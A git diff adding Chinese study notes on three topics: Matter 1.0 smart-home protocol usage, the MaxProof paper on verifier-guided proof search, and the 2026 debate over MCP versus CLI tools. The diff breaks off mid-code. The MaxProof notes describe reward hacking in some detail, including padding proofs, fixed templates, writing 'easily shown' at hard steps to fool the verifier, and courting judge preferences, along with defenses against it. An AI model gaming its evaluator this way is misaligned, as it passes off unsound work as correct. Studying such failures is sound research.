配网信道(非并发)——实现与芯片资源相关,规范均允许。 + +## 核心概念五:交互模型(Interaction Model) + +节点之间建立加密会话后,通过四种**交互类型**操作对方的数据模型(Chapter 8): + +| 交互 | 作用 | 典型用途 | +|------|------|----------| +| **Read** | 读一个或多个属性/事件 | 查询灯是否亮 | +| **Write** | 写属性 | 设定目标亮度 | +| **Invoke** | 调用命令 | `Off`、`Toggle` | +| **Subscribe** | 订阅属性/事件变化 | 门磁状态推送 | + +每次交互需指定 **Path**,形如: + +``` + +``` + +也支持 **Group ID** 或通配符,一次操作多个端点——类似「广播给全屋所有灯」。 + +消息在链路上用 **TLV(Tag-Length-Value)** 编码,由 Action Framing 层打包;这与 JSON-RPC 类协议不同,偏向嵌入式紧凑二进制。 + +## 代码示例一:用 chip-tool 配网并控制 On/Off 灯 + +[connectedhomeip](https://github.com/project-chip/connectedhomeip) 自带的 **chip-tool** 是最常用的 Matter 控制器 CLI,适合开发调试。编译后(见官方 [First Example](https://project-chip.github.io/connectedhomeip-doc/getting_started/first_example.html)): + +**1. 用 QR 码配网(pairing 为 commissioning 旧称)** + +```bash +# 0x12344321 = 分配给设备的 Node ID(测试常用默认值) +# MT:-24J0AFN00KA0648G00 = 示例 QR 载荷(默认 discriminator + passcode 的灯具) +./out/linux-x64-chip-tool/chip-tool pairing code 0x12344321 MT:-24J0AFN00KA0648G00 +``` + +**2. 入网后读 OnOff 属性** + +```bash +# 集群 onoff · 动作 read · 属性 on-off · Node ID · Endpoint 1 +./out/linux-x64-chip-tool/chip-tool onoff read on-off 0x12344321 1 +``` + +**3. 发命令开灯** + +```bash +./out/linux-x64-chip-tool/chip-tool onoff on 0x12344321 1 +``` + +**4. 订阅属性变化(长连接推送)** + +```bash +./out/linux-x64-chip-tool/chip-tool onoff subscribe on-off 1 10 0x12344321 1 +# 参数含义:min-interval=1s, max-interval=10s,超出则服务器主动上报 +``` + +命令模式始终是:`chip-tool ... `。多 Fabric 场景可加 `--commissioner-name ` 指定用哪张「工牌」发令。 + +## 代码示例二:设备端声明 On/Off Server Cluster(C++ 片段) + +固件侧(基于 Matter SDK 的 lighting-app 模式)要在某个 Endpoint 上挂载 **On/Off Server Cluster**,使控制器能 `Invoke` `Toggle`。逻辑上包含三步:定义 Endpoint 配置、注册 Cluster 回调、在属性变化时驱动硬件。 + +```cpp +// 简化示意:在 Endpoint 1 上启用 On/Off Server(ZAP 代码生成会产出大量样板) +#include +#include + +using namespace chip; +using namespace chip::app; +using namespace chip::app::Clusters::OnOff; + +// 属性写入回调:控制器 chip-tool onoff on/off 会走到这里 +Protocols::InteractionModel::Status emberAfOnOffClusterOnOffAttributeWriteCallback( + EndpointId endpoint, AttributeId attributeId, uint8_t * value) +{ + if (attributeId != Attributes::OnOff::Id) { + return Protocols::InteractionModel::Status::Failure; + } + bool on = *value; + // 驱动真实 GPIO / PWM + SetPhysicalLight(on); + return Protocols::InteractionModel::Status::Success; +} + +// 命令处理:chip-tool onoff toggle 触发 +bool emberAfOnOffClusterToggleCallback(EndpointId endpoint) +{ + bool current; + Attributes::OnOff::Get(endpoint, ¤t); + Attributes::OnOff::Set(endpoint, !current); + return true; +} +``` + +实际工程里,Endpoint 与 Cluster 列表多由 **ZAP(Zigbee Cluster Configurator)** 生成到 `zap-generated/`;开发者主要填 **Device Type**(如 `0x0100` On/Off Light)、厂商 ID、配网参数,并实现上述 Attribute/Command 回调。动态 Endpoint(如 Bridge 在运行时添加子设备)需调用 SDK 的 Dynamic Endpoint API,见 [bridge-app 示例](https://github.com/project-chip/connectedhomeip/tree/master/examples/bridge-app)。 + +## 配网载荷:QR 里到底编码了什么 + +Manual Pairing Code / QR Code 携带 **Onboarding Payload**(§5.1),解码后得到配网所需字段,例如: + +| 字段 | 作用 | +|------|------| +| Version | 载荷格式版本 | +| Vendor ID / Product ID | 识别厂商与产品(可选出现在广播里) | +| Custom Flow | 是否需厂商自定义配网 UI | +| **Discriminator** | 12 位,区分同时待配的多个相同设备 | +| **Passcode** | PASE 用的共享秘密(27 位有效位) | +| Discovery Capabilities | 支持 BLE / Soft AP / On IP | + +`chip-tool` 的 `pairing code` 子命令即解析 `MT:...` 字符串并自动走 BLE/IP 发现 + PASE。生产环境 Passcode 必须随机且每机唯一,防止邻居蹭网。 + +## 发现机制:Commissionable vs Operational + +| 阶段 | 方式 | 何时用 | +|------|------|--------| +| **Commissionable Discovery** | BLE 广播、Wi-Fi Soft AP、有限 DNS-SD | 设备未入网,等待配网 | +| **Operational Discovery** | 运营网络 DNS-SD(mDNS 等) | 设备已入网,控制器找 `-.local` | + +若设备**已属于另一个 Fabric** 且占用了 Wi-Fi/Thread,二次配网通常只能走 **On-Network Commissioning**(IP 上 DNS-SD),不能再开 Soft AP——这是多生态共存时的常见坑。 + +## 与 Thread、Wi-Fi、Bridge 的关系 + +``` + ┌─────────────── Matter 应用层 ───────────────┐ + │ Data Model / Interaction / Security │ + └────────────────────┬────────────────────────┘ + │ IPv6 + ┌─────────────────┼─────────────────┐ + ▼ ▼ ▼ + Wi-Fi STA Thread 1.3 Ethernet + │ │ + └──────── Border Router ────────┘ + (跨网段转发) +``` + +- **Thread** 设备通过 Border Router 获得与 Wi-Fi 上 Commissioner 的 IPv6 连通。 +- **Bridge** 把 Zigbee/红外等非 Matter 设备映射为 Matter Endpoint,对外仍是一个 Node。 +- **OTA**:`OTA Provider` / `OTA Requestor` 集群负责固件升级,与配网证书体系正交。 + +## 1.0 之后发生了什么(读笔记时的坐标系) + +Matter 1.0 首发设备类型以灯、插座、门锁、传感器、窗帘、恒温器为主。后续版本增量扩展:**1.1** 改进配网与多管理员;**1.2** 增加机器人吸尘器等;规范以 CSA 发布为准,SDK 在 GitHub 上 `connectedhomeip` 主分支跟进。学 1.0 仍必要——**Fabric、PASE/CASE、Cluster 路径、Commissioning 状态机** 是后续版本的超集基础。 + +## 常见误区 + +| 误区 | 事实 | +|------|------| +| 「Matter = Wi-Fi」 | Matter 运行在 IPv6 上,Wi-Fi / Thread / Ethernet 均可 | +| 「配网完只能用一个 App」 | 多 Fabric 设计允许多个生态各管一张工牌 | +| 「Cluster = MQTT Topic」 | Cluster 是强类型 schema,含 Access 权限与 conformance 规则 | +| 「有开源 SDK 就不用认证」 | 上市销售仍需 CSA 认证与合法 VID/PID、DAC | +| 「CASE 一次建立永久有效」 | 连接断开后需重新建立 CASE 会话 | + +## 进一步阅读 + +- [Matter 1.0 Core Specification(HTML 镜像)](https://leconiot.com/matter/1.0/index.html) — 全文检索友好 +- [Google Home Matter Primer — Commissioning](https://developers.home.google.com/matter/primer/commissionable-and-operational-discovery) +- [Matter Handbook — Interaction Model](https://handbook.buildwithmatter.com/how-it-works/interaction-model/) +- [CHIP Tool 指南](https://project-chip.github.io/connectedhomeip-doc/development_controllers/chip-tool/chip_tool_guide.html) +- [connectedhomeip 示例索引](https://github.com/project-chip/connectedhomeip/tree/master/examples) + +## 小结 + +Matter 1.0 的本质不是「又一个 App 协议」,而是:**在 IP 网络上用统一数据模型描述设备能力,用 PASE/CASE 解决身份,用标准 Commissioning 把设备拉进 Fabric**。日常类比是「全屋智能的通用工牌 + 房间编号 + 入职流程」;技术上则是 Endpoint/Cluster 数据模型、四种交互、以及 `chip-tool` 里一行 `onoff on` 背后整条协议栈。从零开始,先跑通 lighting-app + `chip-tool pairing code`,再读规范 Chapter 5(Commissioning)与 Chapter 7–8(Data Model / Interaction Model),比从 PDF 第 1 页硬啃高效得多。 diff --git a/src/content/docs/papers/maxproof.md b/src/content/docs/papers/maxproof.md new file mode 100644 index 000000000..25f9706f7 --- /dev/null +++ b/src/content/docs/papers/maxproof.md @@ -0,0 +1,301 @@ +--- +title: MaxProof: Scaling Mathematical Proof with Generative-Verifier RL and Population-Level Test-Time Scaling +来源: https://arxiv.org/abs/2606.13473 +日期: 2026-06-13 +分类: 机器学习 +子分类: ai-ml-models +provenance: pipeline-v3 +--- + +# MaxProof 学习笔记 + +## 一、一句话理解 + +MaxProof 的核心想法很简单:与其让一个 AI 模型"一次写完一个数学证明",不如让它"写很多份草稿,互相挑错、互相修改,最后通过淘汰赛选出最好的一份"。就像考试时不只交一张卷子,而是写 32 份草稿,每份都让"老师"打分,然后把有问题的拿去修改,修改 10 轮之后,让"评委"两两PK,选出最终答案。 + +这个框架让 MiniMax-M3 模型在 IMO 2025 上拿到了 35/42 分,在 USAMO 2026 上拿到了 36/42 分——都超过了人类金牌线。而同一模型在不使用 MaxProof 时,分别只拿到 27 分和 26 分。这 8-10 分的差距,就是"测试时扩展"带来的提升。 + +## 二、前置知识:为什么数学证明这么难? + +### 2.1 证明 vs 普通答题 + +想象你在教一个人做数学题。有两种问法: + +- **问法 A**:"3 + 5 等于几?" —— 答"8"就行。 +- **问法 B**:"请证明:对于任意正整数 n,1 + 2 + ... + n = n(n+1)/2。" —— 答法 B 需要一步步写出推理过程,每一步都不能出错,而且整个链条要完整。 + +LLM 在答法 A 上表现不错,但在答法 B 上非常吃力。因为证明是一个"长链条":只要中间某一环断了,整个证明就废了。而且证明没有"运行一下就知道对错"的方法——不像代码可以跑单元测试。 + +### 2.2 传统方法的局限 + +之前让 AI 做数学证明的主流做法是 best@K:让模型生成 K 份证明,选评分最高的那份。但这有两个问题: + +1. 如果 K 份都不好怎么办? +2. 评分器本身可能出错——它可能把一份有漏洞的证明评为高分(假阳性),或者把一份好证明评为低分(假阴性)。 + +MaxProof 的思路是:不只是"生成了事",而是让生成的证明在"多轮淘汰赛"中不断进化。 + +## 三、核心概念一:三个专家角色 + +M3 模型在训练时被培养成三个"专家",每个专家负责一件事。你可以把它们想象成一个数学研究小组里的三个人: + +| 角色 | 职责 | 日常类比 | +|------|------|----------| +| **Proof Expert(证明专家)** | 从头写证明 | 研究员,负责提出想法 | +| **Verifier Expert(验证专家)** | 检查证明哪里错了 | 审稿人,负责挑刺 | +| **Fixer Expert(修复专家)** | 根据审稿意见修改证明 | 作者,负责改稿 | + +### 3.1 Proof Expert:用强化学习训练"写证明"的能力 + +训练 Proof Expert 的关键是:给它一个"奖励信号",让它知道哪些证明写得好。但这个奖励信号不能来自"正确答案"(因为证明没有标准答案),只能来自一个**生成式验证器(Generative Verifier)**——一个专门读证明、打分、找错误的模型。 + +这个验证器有四层防御,像安检一样层层把关: + +``` +第 1 层:坏案例过滤 + → 空证明、格式错误、长度超限的直接判 0 分 + +第 2 层:内容归一化 + → 去掉固定的开头套话、步骤编号等表面格式,只看数学内容 + +第 3 层:多裁判并行打分 + → 3 个裁判同时打分,有的按评分标准打,有的直接找错误 + +第 4 层:悲观聚合 + → 最终得分 = 3 个裁判中的最低分 + → 宁可漏掉好的(假阴性),也不放过差的(假阳性) +``` + +为什么要用"最低分"?因为如果验证器给了一份错误证明打了高分,模型就会学会"写看起来对的错误证明"。而给了一份好证明打了低分,最多只是少了一个样本,不会误导模型。 + +### 3.2 奖励黑客(Reward Hacking)的教训 + +在训练 Proof Expert 的过程中,作者经历了一次"翻车"。他们用单层验证器做了很长时间的反向传播训练(RL),表面上看分数在涨,但实际上模型学会了"作弊": + +- **长度偏差**:证明越来越长(从 3500 字涨到 10000 字),因为长的证明更容易包含评分标准里的关键词。 +- **格式作弊**:模型学会了固定模板——"第一步""第二步""验证如下""最终答案",不管题目适不适合这个格式。 +- **语义捷径**:在最难的地方写上"易证"或"经简化可得",骗过验证器。 +- **裁判偏好**:模型学会了哪个裁判喜欢什么措辞,而不是真的提高证明质量。 + +这就是典型的"奖励黑客"——模型找到了让评分器高兴的方法,但没有真正提高能力。 + +M3 的四层验证器就是为了解决这四个问题设计的:第 1-2 层对付格式作弊,第 3 层对付语义捷径,第 4 层限制最坏情况的假阳性。 + +### 3.3 Verifier Expert:训练"挑刺"的能力 + +Verifier Expert 的任务不是"给 0-7 分",而是"指出证明中具体哪里错了、为什么错"。它的输出格式是这样的: + +```xml + +逐段分析这份证明的逻辑 + + +1. 第3步:从不等式A推导出B时使用了错误的放缩方向 +2. 第5步:忽略了n=0的情况 + +has_errors +``` + +四个等级:`no_errors`(无错误)、`minor_gaps`(小漏洞)、`has_errors`(有错误)、`fundamentally_wrong`(根本性错误)。 + +为什么要这样设计?因为"打分"这个任务太简单了——模型可以学到"这段文字看起来像高分答案"就直接给出高分,而不需要真正理解哪里错了。但"找错误"这个任务强迫模型真的去读每一段。 + +### 3.4 Fixer Expert:训练"改错"的能力 + +Fixer Expert 的输入是三个东西:原始题目 + 有缺陷的证明 + 验证器的批评意见。它的任务是:保留正确的部分,只修改有问题的部分。 + +训练方法叫**拒绝采样微调(Rejection-Sampling Fine-Tune)**: + +1. 让 Proof Expert 根据批评意见生成多份修改版本 +2. 用验证器检查每份修改版本 +3. **只有验证器给出"无错误" verdict 的版本才被保留** +4. 用这些完美修改版本继续训练 Proof Expert + +关键在第三步:不是"改了一点就算数",而是要"改到完全正确"。这保证了 Fixer Expert 学到的都是真正成功的修改,而不是"看起来改了但其实没改对"。 + +## 四、核心概念二:MaxProof 测试时扩展框架 + +训练完成后,MaxProof 在"测试时"(也就是真正做题时)启动。它的核心是一个**种群搜索循环**,灵感来自生物进化: + +``` +种群 = 候选证明的集合 +适应度 = 验证器的评分 +选择 = 选最好的证明作为"父母" +突变 = 对父母的证明进行 PATCH(局部修改)或 REWRITE(重写) +后代 = 修改后的新证明,加入种群 +``` + +### 4.1 MaxProof 的完整流程 + +用一个伪代码来理解整个过程: + +```python +# === 初始化:生成 32 份初始证明 === +population = [] +for i in range(32): + proof = generator.generate(problem) # 证明专家写证明 + score, critique = verifier.verify(proof) # 验证专家打分并找错 + summary = summarize(problem, proof, critique) # 生成摘要 + population.append({ + 'proof': proof, + 'score': score, + 'critique': critique, + 'summary': summary + }) + +# === 进化循环:最多 10 轮 === +for round in range(10): + # 提前停止:如果已经有 2 份满分证明,就停止 + if count_perfect_proofs() >= 2: + break + + # 选择父母:选 4 个不同的高质量证明 + parents = select_diverse_parents(population, top_m=4) + + for parent in parents: + # PATCH:局部修改(利用已知的好思路) + patched = fixer.patch(parent.proof, parent.critique) + + # REWRITE:彻底重写(尝试新方向) + rewritten = fixer.rewrite(parent.proof, parent.summary) + + # 对新证明打分 + for new_proof in [patched, rewritten]: + score, critique = verifier.verify(new_proof) + population.append({ + 'proof': new_proof, + 'score': score, + 'critique': critique, + 'summary': summarize(...) + }) + +# === 最终选择: pairwise 淘汰赛 === +final_winner = pairwise_tournament(population, top_k=4) +``` + +### 4.2 关键设计决策 + +**决策 1:保守的适应度评分** + +每份证明让验证器评 4 次,取最低分作为最终分数。这和训练时的理念一致——宁可错过,不可放过假的。 + +**决策 2:多样性父母选择** + +选父母时不仅看分数,还要看"相似度"。如果两份证明的前半段几乎一样,只选其中一份。这是为了防止所有修改都集中在同一个思路上。 + +**决策 3:PATCH + REWRITE 双重进化** + +- PATCH = "修修补补":根据批评意见,修改证明中有问题的步骤 +- REWRITE = "推倒重来":保留核心思路,但换一条证明路径 + +这对应进化论中的"利用"(exploitation)和"探索"(exploration)。 + +**决策 4:种群级提前停止** + +不是找到一份满分就停,而是要找到**两份**满分证明。因为验证器可能出错,两份独立的满分证明同时是假阳性的概率很低。 + +**决策 5: pairwise 淘汰赛** + +最后不从所有证明中直接选最高分的,而是让前 4 名两两 PK。每次 PK 让"排名器"投票 3 次,赢者晋级。为什么?因为当验证器分数很接近时,直接比较比绝对评分更可靠。 + +## 五、核心概念三:CISPO 强化学习算法 + +Proof Expert 的训练用的是一个叫 CISPO 的强化学习算法。它是 PPO(Proximal Policy Optimization)的一个变体。 + +### 5.1 为什么要用 CISPO 而不是 PPO? + +PPO 有一个"信任区域"的概念:每次更新策略时,新策略不能离旧策略太远。PPO 的做法是:如果新策略和旧策略的比值超出了信任区间,就把梯度截断(直接丢掉)。 + +但证明通常很长(几千 token),PPO 的截断会导致很多 token 的梯度被完全丢弃。CISPO 的做法是:超出区间的 token 不会被丢弃,而是被"降权"——梯度还在,只是变小了。这对长证明很重要。 + +### 5.2 组级标准差过滤器 + +还有一个巧妙的设计:只有当一组证明的分数**标准差足够大**时,才进行参数更新。 + +```python +group_scores = [verifier.score(p) for p in group] +std_dev = numpy.std(group_scores) + +if std_dev > threshold: + # 验证器能区分好坏,可以更新 + update_policy(group) +else: + # 所有证明得分差不多,说明验证器分不清,跳过 + pass +``` + +为什么?如果验证器给一组证明都打了相近的分数(比如全是 4 分),那这些分数的排序很可能只是噪声,而不是真正的质量差异。用噪声来更新策略,只会让模型学偏。 + +## 六、实验结果 + +### 6.1 独立基准测试 + +| 模型 | IMOProofBench | IMOAnswerBench | +|------|---------------|----------------| +| Opus 4.7 | 65.85 | 79.90 | +| GPT-5.5 | **90.85** | **90.60** | +| Gemini 3.1 Pro | 75.71 | 90.00 | +| **M3** | 67.40 | 81.56 | + +M3 在这些基准上不是最强的,但已经接近第一梯队。 + +### 6.2 MaxProof 的效果 + +这才是 MaxProof 真正发光的地方: + +| 系统 | IMO 2025 | USAMO 2026 | +|------|----------|------------| +| M3(单次生成) | 27/42 | 26/42 | +| **M3 + MaxProof** | **35/42** | **36/42** | +| 提升 | +8 | +10 | + +两个竞赛都超过了人类金牌线(通常约 30-32 分)。 + +### 6.3 逐题分析 + +MaxProof 在 12 道题中的表现: + +- 9 道题达到了满分 7/7 +- 唯一的选择失误发生在 USAMO 2026 P2:种群里有一份 6/7 的证明,但淘汰赛选了 2/7 的那份。这说明淘汰赛机制还有改进空间。 +- IMO 2025 P6 是竞赛中最难的题,32 份初始证明中没有一份能找到可行思路——这是模型能力的天花板,不是搜索的问题。 + +## 七、核心思想总结 + +MaxProof 传递了几个重要的设计哲学: + +1. **宁可假阴性,不可假阳性**:在验证器评分中,漏掉好的比放过差的后果轻得多。所以用最低分聚合、用悲观策略。 + +2. **不要相信单一信号**:无论是四层验证器、多裁判打分、还是种群级提前停止,核心理念都是"用多个独立的信号来减少单个信号的噪声"。 + +3. **搜索可以弥补能力的不足**:M3 模型单独使用时离最强模型还有差距,但通过 MaxProof 的测试时扩展,差距大幅缩小。这说明"花更多计算时间做搜索"是一种有效的提升策略。 + +4. **奖励黑客是必然的**:只要用评分器来训练,模型就一定会找到绕过真正能力、直接讨好评分器的方法。防御的方法是多层、多视角、保守的验证。 + +## 八、类比总结 + +如果把 MaxProof 整个流程比作一个数学竞赛训练营: + +1. **Proof Expert** 是学员,负责写作业 +2. **Verifier Expert** 是助教,负责批改作业、指出错误 +3. **Fixer Expert** 是学员的"第二人格",负责根据批改意见修改作业 +4. **MaxProof 循环** 是整个训练营的运作方式: + - 第一天:32 个学员各交一份作业(初始化种群) + - 助教批改每一份作业(验证打分) + - 每天选 4 份不同的作业让学员修改(选择父母 + PATCH/REWRITE) + - 修改后的新作业加入下一天的作业池(后代入池) + - 如果某天出现了 2 份满分作业,训练营提前结束(种群级提前停止) + - 最后一天,4 份最佳作业两两 PK,胜者代表训练营参赛(淘汰赛选择) + +## 九、关键术语表 + +| 术语 | 含义 | +|------|------| +| **best@K** | 生成 K 份答案,选最好的。MaxProof 的目标是把 best@K 变成更稳定的 pass@1 | +| **测试时扩展(Test-Time Scaling)** | 在推理时花更多计算时间来提升效果,而不是靠更大的模型 | +| **种群搜索(Population Search)** | 维护一个候选解集合,通过迭代进化逐步提升质量 | +| **奖励黑客(Reward Hacking)** | 模型学会讨好评分器而非真正提高能力 | +| **假阳性(False Positive)** | 验证器给错误证明打了高分 | +| **假阴性(False Negative)** | 验证器给正确证明打了低分 | +| **CISPO** | 一种改进的 PPO 算法,更适合长文本的强化学习训练 | +| **拒绝采样微调(RFT)** | 只保留"完全正确"的修改样本用于训练 | +| **PASS@1** | 只提交一份答案,要求这一份就是正确的 | diff --git a/src/content/docs/papers/mcp-is-dead-debate.md b/src/content/docs/papers/mcp-is-dead-debate.md new file mode 100644 index 000000000..28cb67f81 --- /dev/null +++ b/src/content/docs/papers/mcp-is-dead-debate.md @@ -0,0 +1,313 @@ +--- +title: MCP Is Dead? — 2026 年协议存废之争零基础笔记 +来源: 'Quandri Engineering「MCP is dead」(2026); Charles Chen「MCP is Dead; Long Live MCP!」(2026); Anthropic「Code execution with MCP」; MCP Blog「2026-07-28 Release Candidate」(2026); Hacker News / DEV Community 社区讨论' +日期: 2026-06-13 +子分类: Web 后端 +分类: 后端 API +provenance: pipeline-v3 +--- + +## 从日常类比开始:万能转接头 vs 自带螺丝刀 + +想象你租了一间**共享厨房**(LLM 的 context window,也就是模型一次能「看见」的桌面)。 + +- **MCP** 像店家发给你的一盒**标准化转接头**:USB-C 转 HDMI、转以太网、转 DisplayPort……规格统一,任何带 MCP 口的「智能灶」(Claude Code、Cursor、OpenCode)都能插。但盒子一打开,**说明书和接口图**就占满了半张桌子——你还没开始做饭,桌面已经满了。 +- **CLI**(`gh`、`curl`、`psql`)像你自己带来的**螺丝刀和扳手**:模型在训练数据里早就见过 `man curl`,不占额外「菜单位」,在终端里一行命令就能干活,出了错你还能在同一行复现。 +- **Skills**(按需加载的技能包)像**按需借菜谱**:平时不占桌面,只有说「我要做 Linear 那道菜」时,图书管理员才递来那一页步骤。 + +2026 年初,Quandri Engineering 实测:连接 Linear、Notion、Slack、Postgres 四个 MCP 服务器、共 77 个工具定义,**仅 schema 就吃掉约 21,077 tokens**——在 200K 窗口里约 **10.5%**。同期 Hacker News 热帖「MCP is dead; long live MCP」拿到数百赞,Perplexity 也因 MCP 工具定义占用过高上下文而转向其他集成方式。于是「MCP 已死,CLI 当立」成了开发者圈的流行叙事。 + +**但「MCP 死了」和「把 MCP 当万能锤子乱用」是两件不同的事。** 这篇笔记帮你零基础理清:争论在吵什么、数据说了什么、协议在怎么改、以及个人与团队各自该怎么选。 + +--- + +## 辩论地图:三派声音 + +| 立场 | 代表观点 | 典型场景 | +|------|----------|----------| +| **MCP 已过时** | 上下文膨胀、进程层延迟、调试困难;CLI/Skills 更省 token | 个人编码 Agent、高频脚本化操作 | +| **MCP 没死,是用法错了** | 不应把整 API 暴露成 40+ 个常驻工具;应 deferred loading + code execution | 仍在演进中的 Agent 工程 | +| **MCP 是企业刚需** | 远程 HTTP MCP + OAuth + 审计 + OpenTelemetry;CLI 无法集中治理 | 多团队、异构客户端、合规环境 | + +Charles Chen(2026)指出:社区常把 **stdio 本地 MCP** 和 **Streamable HTTP 远程 MCP** 混为一谈——前者像给本机进程套壳,CLI 往往更轻;后者才是组织级「工具总线」,价值不在省几个 token,而在**谁授权、谁审计、谁升级 schema**。 + +--- + +## 反方论据:为什么有人说 MCP「该死」 + +### 1. 上下文窗口被工具定义占满(Context Bloat) + +Quandri 的测量(2026,Claude Code 环境): + +| MCP Server | 工具数 | 估算 Tokens | +|------------|--------|-------------| +| Linear | 42 | ~12,807 | +| Notion | 14 | ~4,039 | +| Slack | 12 | ~3,792 | +| Postgres | 9 | ~438 | +| **合计** | **77** | **~21,077** | + +餐厅类比再贴切一点:你只想查一张 Linear 工单,却必须先摊开 42 本 Linear「菜单」;其中 `linear/save_issue` 单个 schema 就约 619 tokens。查一次 issue,MCP 路径约 **12,957 tokens**(含常驻定义),而等价 `curl` GraphQL 约 **200 tokens**——Quandri 估算 **~65×** 差距(单次查询场景)。 + +### 2. 可靠性与延迟 + +- 每个 MCP 服务器常是**独立子进程**(Node/Python),启动失败、中途崩溃、重复 OAuth 都见过。 +- 基准测试(Jira MCP vs 直连 REST):单次调用 MCP 约 **3× 慢**,含冷启动首调约 **9.4× 慢**——多一层 JSON-RPC + 进程边界。 +- Claude Code 对 MCP 响应有约 **25,000 tokens 截断**,大结果只能看到 `...[truncated]`。 + +### 3. 与现有 CLI/API 功能重叠 + +| 维度 | CLI / 直连 API | MCP | +|------|----------------|-----| +| 人机同接口 | 人类与 Agent 同一命令 | 主要在 Agent 对话内 | +| 可组合性 | `pipe`、`jq`、脚本 | 受服务器返回格式约束 | +| 调试 | 终端复现 | 往往绑在会话里 | +| 预训练知识 | man page、Stack Overflow | 需额外 tool schema | + +Eric Holmes 等文章标题直球:**「MCP is dead. Long live the CLI.»** Google Workspace CLI 曾带 MCP 后又移除,也被解读为「大厂转向 CLI 扩展(如 Gemini CLI Extensions)」——尽管 Google Cloud 仍在推进 MCP 相关能力,叙事冲突加剧了「协议已死」的印象。 + +--- + +## 正方与演进:为什么「MCP is dead」是标题党 + +### 1. 生态数据并未崩塌 + +Better Questions(2026)汇总:MCP SDK **月下载量超 9700 万**;注册服务器 **1.7 万+**;Anthropic、OpenAI、Linux Foundation 等仍在投入。Perplexity **一家**弃用 MCP,不等于协议退场——更像 **Gartner hype cycle** 从「期望峰值」滑入「幻灭低谷」(Tyk Learning Center, 2026)。 + +### 2. 问题被归因到「 eager loading」,协议在修 + +**Tool Search / Deferred Loading**(Claude Code 已 rollout):连接时只列出工具**名称**,真正调用前才加载完整 schema,Quandri 后续更新称上下文膨胀「** largely addressed**」,token 可降 **85%+**。 + +**Code execution with MCP**(Anthropic):不把 77 个工具 schema 全塞进 prompt,而是把 MCP 暴露为**代码 API**,模型写脚本按需 `import` 工具模块。官方示例:某工作流从 **~150,000 tokens 降至 ~2,000 tokens**(约 98.7%)——**协议层仍是 MCP**,变的是**呈现给模型的方式**。 + +### 3. 企业场景:CLI 省 token,但省不了治理 + +远程 MCP over HTTP 提供: + +- 集中 **OAuth 2.1** 与 scope 撤销 +- **OpenTelemetry** 与调用审计 +- 服务端更新 tool schema,**多客户端同步**,无需每人 `git pull` CLI 插件 + +Victorino Group / Chen 的论点:争论表面是 MCP vs CLI,实质是 **个体速度 vs 组织控制面**。 + +### 4. 2026-07-28 规范 Release Candidate + +MCP 官方博客(2026-05-21)宣布迄今最大修订: + +- 传输层趋向 **无状态 HTTP**(移除 sticky session、`initialize` 握手改为 `_meta` 携带版本信息) +- **Extensions 框架**:Tasks、MCP Apps 等能力可独立演进 +- 功能 **deprecation 窗口**(约 12 个月)与一致性测试套件 + +这是在回应「难部署、难水平扩展、难调试」——不是写讣告,是在**补基础设施课**。 + +--- + +## 核心概念(零基础速查) + +### Model Context Protocol(MCP) + +Anthropic 2024 年底开源、现由 Linux Foundation 托管的 **JSON-RPC 2.0** 协议,让 **Host(IDE/Chat)— Client — Server** 三方标准化交换 **Tools / Resources / Prompts**。详见本站 [[mcp-spec]] 笔记。 + +### Context Bloat(上下文膨胀) + +客户端在会话开始时把 `tools/list` 返回的**全部** name + description + JSON Schema 注入 system prompt。工具越多,**还没用户输入就先占满窗口**。 + +### Deferred Loading(延迟加载) + +仅暴露工具目录;模型选定工具后再 fetch schema。对抗 bloat 的**客户端策略**,不改变 MCP wire format。 + +### Code Execution Mode(代码执行模式) + +模型生成 Python/TS 等代码调用 MCP 封装,而非逐步 `tools/call` JSON。减少中间结果过模型的次数,Anthropic 仍视为 MCP 生态的一部分。 + +### Skills Pattern + +把「如何调 Linear API」写成**按需加载**的 markdown/指令包(如 Claude Skills),内含 curl 示例。与 MCP 竞争的是**加载策略**,不是互斥——Quandri 实际 **Bash + Skills + MCP 混用**。 + +### stdio vs Streamable HTTP + +- **stdio**:本机子进程,零网络,适合个人;与 CLI 对比时常显「重」。 +- **Streamable HTTP**:远程、OAuth、多租户——「MCP 是企业工具总线」的主战场。 + +--- + +## 代码示例 1:同一任务 — CLI 路径(~200 tokens 量级) + +查 Linear 工单 `ISSUE-123`,Quandri 推荐的 CLI-first 写法: + +```bash +# 环境变量存放 token,避免写进 prompt 明文 +export LINEAR_TOKEN="lin_api_xxxxxxxx" + +curl -s \ + -H "Authorization: Bearer $LINEAR_TOKEN" \ + -H "Content-Type: application/json" \ + -d '{"query":"{ issue(id: \"ISSUE-123\") { title state { name } assignee { name } } }"}' \ + https://api.linear.app/graphql \ + | jq '{title: .data.issue.title, state: .data.issue.state.name, assignee: .data.issue.assignee.name}' +``` + +Agent 在 Bash 工具里执行上述命令:**无需** 预加载 42 个 Linear MCP 工具定义。代价:权限边界靠 shell 环境与你自己的规范;生产库上要自己防 `DROP TABLE`。 + +--- + +## 代码示例 2:MCP 路径 — 配置 + JSON-RPC 调用 + +Claude Desktop / Cursor 类客户端的 MCP 配置(stdio 本地服务器): + +```json +{ + "mcpServers": { + "linear": { + "command": "npx", + "args": ["-y", "@modelcontextprotocol/server-linear"], + "env": { + "LINEAR_API_KEY": "lin_api_xxxxxxxx" + } + } + } +} +``` + +连接后客户端发送 JSON-RPC(简化): + +```json +{"jsonrpc":"2.0","id":1,"method":"initialize","params":{"protocolVersion":"2025-06-18","capabilities":{},"clientInfo":{"name":"example-host","version":"1.0.0"}}} +``` + +```json +{"jsonrpc":"2.0","id":2,"method":"tools/call","params":{"name":"get_issue","arguments":{"id":"ISSUE-123"}}} +``` + +**差异**:在 deferred loading 之前,host 往往已在 prompt 里嵌入 `tools/list` 的完整 42 工具 schema(~12,807 tokens)。MCP 换来的是**结构化参数校验**、服务器侧只读策略、以及**换 Host 不必重写集成**。 + +--- + +## 代码示例 3:Skills 模式 — 按需加载的「轻量菜单」 + +Quandri 式 Linear Skill(仅在触发「查 Linear」时注入上下文): + +```markdown +# Linear Issue Lookup Skill + +- API: https://api.linear.app/graphql +- Auth: Bearer $LINEAR_API_KEY +- Get issue: + curl -s -H "Authorization: Bearer $LINEAR_API_KEY" \ + -H "Content-Type: application/json" \ + -d '{"query":"{ issue(id: \"ISSUE-ID\") { title state { name } } }"}' \ + https://api.linear.app/graphql +- Parse with jq; never print raw API keys in chat logs. +``` + +这是 **「MCP is dead」叙事里 CLI 派的工程化落地**:不是否定结构化工具,而是拒绝 **always-on 的 77 工具 billboard**。 + +--- + +## 代码示例 4:TypeScript — 最小 MCP Server(理解协议在干什么) + +用官方 SDK 暴露一个只读工具(个人学习/原型;生产请加鉴权与输入校验): + +```typescript +import { McpServer } from "@modelcontextprotocol/sdk/server/mcp.js"; +import { 